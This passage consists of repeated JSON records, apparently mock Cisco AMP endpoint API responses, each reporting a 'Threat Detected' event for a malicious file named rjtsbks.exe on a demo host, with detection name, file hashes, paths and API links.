Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":644000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":629000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":598000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":535000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":520000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163593","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163592","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163591","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163590","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163589","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163588","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163587","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163586","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":395000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163585","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 